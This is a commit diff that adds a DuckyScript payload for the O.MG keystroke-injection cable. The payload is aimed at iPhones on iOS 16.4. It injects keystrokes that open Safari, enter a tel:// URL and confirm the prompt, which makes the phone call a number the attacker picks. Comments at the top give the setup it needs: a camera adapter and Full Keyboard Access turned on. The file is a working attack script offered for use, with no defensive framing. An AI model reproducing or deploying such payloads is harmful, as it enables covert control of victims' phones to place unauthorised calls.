mirror of https://github.com/hak5/omg-payloads.git
commit
490010a6ae
|
@ -0,0 +1,52 @@
|
||||||
|
REM Version 1.0
|
||||||
|
|
||||||
|
REM OS: iOS
|
||||||
|
|
||||||
|
REM Author: Peaakss / Peaks
|
||||||
|
REM -----------------------------------------------
|
||||||
|
REM READ THIS BEFORE USING PAYLOAD
|
||||||
|
|
||||||
|
REM Description: This payload uses a URL scheme to quickly call a defined phone number
|
||||||
|
|
||||||
|
REM NOTICE Payload was made on iOS 16.4 - iPhone | Timing may have have to be changed based on version/model
|
||||||
|
|
||||||
|
REM NOTICE Lighting to USB-A or USB-C camera adapter is needed to run this payload, active end of the O.MG cable must be plugged into the end of the adapter, the lighting end is displayed on the sales page before purchasing the O.MG cable, a adapter is needed because there is no lightning active end
|
||||||
|
|
||||||
|
REM NOTICE This payload needs Full Keyboard Access to enabled on the device
|
||||||
|
|
||||||
|
REM NOTICE Make sure to change "Phone Number" with the number you wish to call.
|
||||||
|
|
||||||
|
REM -----------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
DEFINE #NUMBER "Phone Number"
|
||||||
|
DEFINE #URL tel://#NUMBER
|
||||||
|
|
||||||
|
FUNCTION MAIN()
|
||||||
|
DELAY 1000
|
||||||
|
GUI h
|
||||||
|
DELAY 250
|
||||||
|
GUI h
|
||||||
|
DELAY 500
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 1500
|
||||||
|
STRING Safari
|
||||||
|
DELAY 1000
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
GUI n
|
||||||
|
DELAY 500
|
||||||
|
GUI l
|
||||||
|
DELAY 250
|
||||||
|
STRING #URL
|
||||||
|
DELAY 2000
|
||||||
|
ENTER
|
||||||
|
DELAY 1500
|
||||||
|
TAB
|
||||||
|
DELAY 500
|
||||||
|
UPARROW
|
||||||
|
DELAY 250
|
||||||
|
SPACE
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
MAIN()
|
Loading…
Reference in New Issue